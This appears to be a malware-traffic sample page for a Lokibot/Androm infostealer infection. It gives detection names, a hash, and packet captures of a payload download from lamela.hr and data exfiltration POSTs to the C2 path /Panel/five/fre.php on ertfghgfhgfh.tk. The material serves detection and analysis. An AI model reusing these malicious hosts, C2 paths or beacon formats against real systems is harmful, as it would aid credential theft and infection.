ANDROM Infostealer Lokibot Malware Traffic Sample PCAP file download analysis lamela.hr ertfghgfhgfh.tk POST /Panel/five/fre.php (Charon; Inferno)

Download Attachments

  • pcap wire
    Date added: May 15, 2017 2:59 am Added by: admin File size: 1,003 KB Downloads: 18
SHA256: 6c99dd395a98d20237d05527e84ef8d0d2f9f2a599494ee0632c7bfab2399e33
File name: wire145.exe
Detection ratio: 37 / 61
Analysis date: 2017-05-15 02:54:56 UTC ( 0 minutes ago )
Kaspersky Backdoor.Win32.Androm.ngwk 20170515
McAfee Artemis!F65BE5A2E77C 20170515
McAfee-GW-Edition BehavesLike.Win32.Virus.th 20170514
eScan Trojan.GenericKD.5065116 20170515
NANO-Antivirus Trojan.Win32.Androm.eotpjr 20170514
Palo Alto Networks (Known Signatures) generic.ml 20170515
Panda Trj/GdSda.A 20170514
Qihoo-360 Trojan.Generic 20170515
Rising Malware.Generic.3!tfe (cloud:DiQytucAL2U) 20170515
Sophos Mal/Generic-S 20170514
Symantec Infostealer.Lokibot 20170514
Tencent Win32.Trojan.Inject.Auto 20170515
TrendMicro-HouseCall Suspicious_GEN.F47V0513 20170515
VIPRE Trojan.Win32.Generic!BT 20170515
Webroot W32.Trojan.Gen 20170515
ZoneAlarm by Check Point Backdoor.Win32.Androm.ngwk 20170514

2017-05-14 21:26:44.615814 IP 192.168.1.102.58035 > 176.62.8.9.80: Flags [P.], seq 0:394, ack 1, win 256, length 394: HTTP: GET /wire145.exe HTTP/1.1
E…Z.@…$ …f.>.     …P…\i.0UP….c..GET /wire145.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: lamela.hr
Connection: Keep-Alive

2017-05-14 21:27:25.906564 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…{.@……..f*p…..PV..     M…P…k…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 208
Connection: close

2017-05-14 21:27:26.191163 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 246:454, ack 1, win 256, length 208: HTTP
E…{.@……..f*p…..PV…M…P…S…..’…….ckav.ru..
…u.s.e.r.n.a.m.e.1.3.4…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…………………k……………..0…3.D.F.D.8.1.C.0.7.0.8.A.4.B.C.A.3.3.3.5.F.6.4.B…..dRbP1….

2017-05-14 21:28:04.178218 IP 192.168.1.102.58043 > 8.254.247.46.80: Flags [P.], seq 345:518, ack 24469, win 256, length 173: HTTP: HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
E…&.@….R…f…….P..O…..P…….HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent
Host: download.windowsupdate.com

2017-05-14 21:30:57.454058 IP 192.168.1.102.58053 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…|.@……..f*p…..P”.z.p.PnP…-…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 181
Connection: close

 

Leave a Reply